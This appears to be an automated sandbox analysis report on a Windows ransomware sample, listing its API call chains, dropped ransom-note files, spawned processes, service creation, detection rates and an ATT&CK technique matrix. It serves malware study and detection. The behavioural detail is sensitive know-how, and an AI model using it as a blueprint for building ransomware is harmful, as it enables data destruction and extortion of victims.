Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00407D2C GetModuleFileNameW,WaitForSingleObject,NtClose,1_2_00407D2C
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00405E35 wcslen,wcslen,RtlAllocateHeap,wcscpy,wcscat,RtlAllocateHeap,wcscpy,wcscat,MoveFileExW,CreateFileW,CreateIoCompletionPort,NtClose,RtlAllocateHeap,NtClose,memcpy,memcpy,PostQueuedCompletionStatus,RtlFreeHeap,NtClose,InterlockedIncrement,RtlFreeHeap,RtlFreeHeap,1_2_00405E35
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00405CC1 SetFilePointerEx,NtClose,1_2_00405CC1
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004055D1 NtQueryObject,_wcsicmp,RtlFreeHeap,1_2_004055D1
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004056D4 PathFindFileNameW,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,NtOpenProcess,NtDuplicateObject,PathFindFileNameW,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,PathFindFileNameW,NtTerminateProcess,WaitForSingleObject,NtClose,NtClose,memset,memset,NtClose,NtClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_004056D4
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00408BD6 NtSetThreadExecutionState,wcslen,RtlAllocateHeap,wcsstr,wcscat,RtlFreeHeap,wcscpy,GetFileAttributesW,PathIsUNCServerW,PathFindExtensionW,_wcsicmp,RtlFreeHeap,PathIsNetworkPathW,wcslen,RtlAllocateHeap,wcscat,RtlFreeHeap,PathIsNetworkPathW,wcslen,RtlAllocateHeap,wcscat,RtlFreeHeap,1_2_00408BD6
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004048D8 NtQuerySystemInformation,NtOpenProcess,NtTerminateProcess,NtClose,RtlFreeHeap,1_2_004048D8
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004022D9 NtSetInformationProcess,NtSetInformationProcess,1_2_004022D9
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004072E0 CreateThread,WaitForSingleObject,NtTerminateThread,GetExitCodeThread,NtClose,1_2_004072E0
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004054E0 CreateThread,WaitForSingleObject,NtTerminateThread,GetExitCodeThread,NtClose,1_2_004054E0
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00401AE1 NtDuplicateToken,NtSetInformationThread,NtClose,1_2_00401AE1
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004069E1 CreateIoCompletionPort,CreateThread,CreateThread,Sleep,PostQueuedCompletionStatus,PostQueuedCompletionStatus,WaitForMultipleObjects,NtClose,NtClose,1_2_004069E1
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004039E3 SHGetSpecialFolderPathW,wcscat,wcslen,RtlAllocateHeap,RtlFreeHeap,RtlFreeHeap,RegCreateKeyExW,wcslen,RegSetValueExW,NtClose,wcscpy,wcscat,RtlFreeHeap,RegCreateKeyExW,wcslen,RegSetValueExW,NtClose,SHChangeNotify,1_2_004039E3
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00407784 RtlAllocateHeap,GetModuleFileNameW,RtlAllocateHeap,RtlAllocateHeap,wcslen,wcslen,RtlAllocateHeap,wcscat,wcscat,RtlFreeHeap,WaitForMultipleObjects,MapViewOfFile,UnmapViewOfFile,NtClose,NtClose,WaitForMultipleObjects,MapViewOfFile,UnmapViewOfFile,NtClose,NtClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00407784
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_0040318A memset,OpenWindowStationW,NtSetSecurityObject,OpenDesktopW,NtSetSecurityObject,CloseDesktop,CloseWindowStation,1_2_0040318A
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00401C9B CreateFileW,WriteFile,NtClose,1_2_00401C9B
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004020A3 NtOpenProcessToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap,NtClose,1_2_004020A3
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004055AB NtQueryObject,_wcsicmp,RtlFreeHeap,1_2_004055AB
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00402FB6 NtQueryInformationProcess,1_2_00402FB6
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004048B6 NtQuerySystemInformation,NtOpenProcess,NtTerminateProcess,NtClose,RtlFreeHeap,1_2_004048B6
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00406EB7 GetModuleFileNameW,GetLogicalDriveStringsW,RtlAllocateHeap,GetLogicalDriveStringsW,RtlAllocateHeap,RtlAllocateHeap,GetDriveTypeW,WaitForMultipleObjects,MapViewOfFile,UnmapViewOfFile,NtClose,NtClose,WaitForMultipleObjects,MapViewOfFile,UnmapViewOfFile,NtClose,NtClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00406EB7
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004033B9 CreateFontW,SelectObject,RtlAllocateHeap,_swprintf,GetTextExtentPoint32W,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,memset,SelectObject,SHGetSpecialFolderPathW,wcscat,wcslen,CreateFileW,WriteFile,WriteFile,WriteFile,NtClose,wcscat,RegCreateKeyExW,wcslen,RegSetValueExW,wcslen,RegSetValueExW,SystemParametersInfoW,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,NtClose,NtClose,DeleteObject,DeleteObject,RtlFreeHeap,DeleteObject,DeleteDC,DeleteDC,1_2_004033B9
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004054BB NtQueryInformationFile,1_2_004054BB
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004027BC RegisterServiceCtrlHandlerW,SetServiceStatus,NtOpenProcessToken,NtDuplicateToken,NtSetInformationToken,memset,memset,CreateProcessAsUserW,NtClose,NtClose,NtClose,NtClose,SetServiceStatus,1_2_004027BC
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00402742 OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,1_2_00402742
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00406C06 wcslen,wcslen,RtlAllocateHeap,wcschr,_swprintf,memset,memset,CreateProcessAsUserW,CreateProcessWithTokenW,CreateProcessW,_swprintf,CreateFileMappingW,ResumeThread,NtClose,RtlFreeHeap,1_2_00406C06
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402E441_2_00402E44
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00404A881_2_00404A88
                      Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
                      Source: P3FwQWmwUM.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: P3FwQWmwUM.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engine | Classification label: mal92.rans.evad.winEXE@19/47@0/1
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00407D8B GetLogicalDriveStringsW,RtlAllocateHeap,GetLogicalDriveStringsW,RtlAllocateHeap,GetDriveTypeW,GetDiskFreeSpaceExW,_alldiv,_alldiv,_swprintf,wcslen,RtlReAllocateHeap
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_004026A6
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004026A6 OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,CloseServiceHandle
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00402A1F StartServiceCtrlDispatcherW
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\89f3671df4dda4177e202fbdb1910c9c
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5448:120:WilError_01
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Temp\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: P3FwQWmwUM.exe | Virustotal: Detection: 45%
                      Source: P3FwQWmwUM.exe | ReversingLabs: Detection: 62%
                      Source: unknown | Process created: C:\Users\user\Desktop\P3FwQWmwUM.exe 'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Process created: C:\Users\user\Desktop\P3FwQWmwUM.exe 'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Process created: C:\Users\user\Desktop\P3FwQWmwUM.exe C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Process created: C:\Users\user\Desktop\P3FwQWmwUM.exe 'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Process created: C:\Users\user\Desktop\P3FwQWmwUM.exe C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Windows\System32\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
                      Source: P3FwQWmwUM.exe | Static PE information: certificate valid
                      Source: P3FwQWmwUM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00401867 LoadLibraryA,GetProcAddress
                      Source: initial sample | Static PE information: section where entry point is pointing to: .text1
                      Source: P3FwQWmwUM.exe | Static PE information: real checksum: 0x1b03e should be: 0x1e38a
                      Source: P3FwQWmwUM.exe | Static PE information: section name: .text1
                      Source: initial sample | Static PE information: section name: .text entropy: 7.95739719557
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\Desktop\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\Documents\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\Music\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\Pictures\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\Videos\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\Downloads\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\Favorites\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\Links\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Microsoft\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Microsoft\WindowsApps\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Temp\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\Saved Games\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004026A6 OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,CloseServiceHandle
                      Source: C:\Windows\System32\svchost.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,memset,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,RtlFreeHeap,1_2_004046E2
                      Source: C:\Windows\System32\svchost.exe TID: 4048 | Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00403EDD wcscat,FindFirstFileExW,wcsrchr,wcscpy,FindNextFileW,FindClose
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00401B91 wcslen,RtlAllocateHeap,wcscpy,wcscat,FindFirstFileExW,FindNextFileW,FindClose,RtlFreeHeap
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_0040409F wcslen,RtlAllocateHeap,wcscpy,wcscat,FindFirstFileExW,wcslen,wcslen,RtlAllocateHeap,wcscpy,wcsrchr,wcscpy,GetFileAttributesW,RemoveDirectoryW,RtlFreeHeap,DeleteFileW,RtlFreeHeap,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004066AC wcslen,RtlAllocateHeap,wcscpy,GetFileAttributesW,wcscat,FindFirstFileExW,wcslen,wcslen,RtlAllocateHeap,wcscpy,wcsrchr,wcscat,GetFileAttributesW,wcsstr,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00403FBA wcscpy,wcscat,FindFirstFileExW,wcscpy,wcscat,FindNextFileW,FindClose
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00403E86 GetLogicalDriveStringsW,GetDriveTypeW
                      Source: svchost.exe, 0000000A.00000002.518469990.000002AA91D40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.325436632.000002E872540000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: svchost.exe, 00000006.00000002.511001882.0000020C762EF000.00000004.00000001.sdmp | Binary or memory string: @Hyper-V RAW
                      Source: svchost.exe, 00000006.00000002.520513505.0000020C77654000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000008.00000002.509479778.0000016781202000.00000004.00000001.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000000A.00000002.518469990.000002AA91D40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.325436632.000002E872540000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: svchost.exe, 0000000A.00000002.518469990.000002AA91D40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.325436632.000002E872540000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: svchost.exe, 00000008.00000002.510850863.0000016781240000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.511888178.000002AA91067000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.508453273.0000023E35A2A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: svchost.exe, 0000000A.00000002.518469990.000002AA91D40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.325436632.000002E872540000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00402367 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,wcscpy,wcscat,wcslen,RtlFreeHeap,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00401867 LoadLibraryA,GetProcAddress
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00402367 mov ebx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004016D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_0040A288 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004017AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_0040221B wcscpy,wcschr,LogonUserW,wcslen
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Process created: C:\Users\user\Desktop\P3FwQWmwUM.exe C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\
                      Source: P3FwQWmwUM.exe, 00000003.00000002.510938998.0000000000D80000.00000002.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000002.513037161.0000000000CF0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.512991576.0000020B74790000.00000002.00000001.sdmp, notepad.exe, 00000016.00000002.513746818.0000019FB7120000.00000002.00000001.sdmp | Binary or memory string: uProgram Manager
                      Source: P3FwQWmwUM.exe, 00000003.00000002.510938998.0000000000D80000.00000002.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000002.513037161.0000000000CF0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.512991576.0000020B74790000.00000002.00000001.sdmp, notepad.exe, 00000016.00000002.513746818.0000019FB7120000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: P3FwQWmwUM.exe, 00000003.00000002.510938998.0000000000D80000.00000002.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000002.513037161.0000000000CF0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.512991576.0000020B74790000.00000002.00000001.sdmp, notepad.exe, 00000016.00000002.513746818.0000019FB7120000.00000002.00000001.sdmp | Binary or memory string: Progman
                      Source: P3FwQWmwUM.exe, 00000003.00000002.510938998.0000000000D80000.00000002.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000002.513037161.0000000000CF0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.512991576.0000020B74790000.00000002.00000001.sdmp, notepad.exe, 00000016.00000002.513746818.0000019FB7120000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT VolumeInformation
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00407EFB GetUserNameW,RtlAllocateHeap,GetUserNameW,RtlFreeHeap
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: svchost.exe, 0000000E.00000002.511831387.00000229BCF02000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Directory queried: C:\Documents and Settings
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Directory queried: C:\Users\Default\Documents
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Directory queried: C:\Users\Default\Documents\My Music
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Directory queried: C:\Users\Default\Documents\My Pictures
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Directory queried: C:\Users\Default\Documents\My Videos

                      Mitre Att&ck Matrix (one row per line, cells separated by " | "; a trailing digit is the report's hit count for that technique)

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts 2 | Windows Management Instrumentation 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | Input Capture 1 | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Defacement 1
                      Default Accounts | Native API 1 | Valid Accounts 2 | Valid Accounts 2 | Obfuscated Files or Information 1 | LSASS Memory | System Service Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Proxy 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
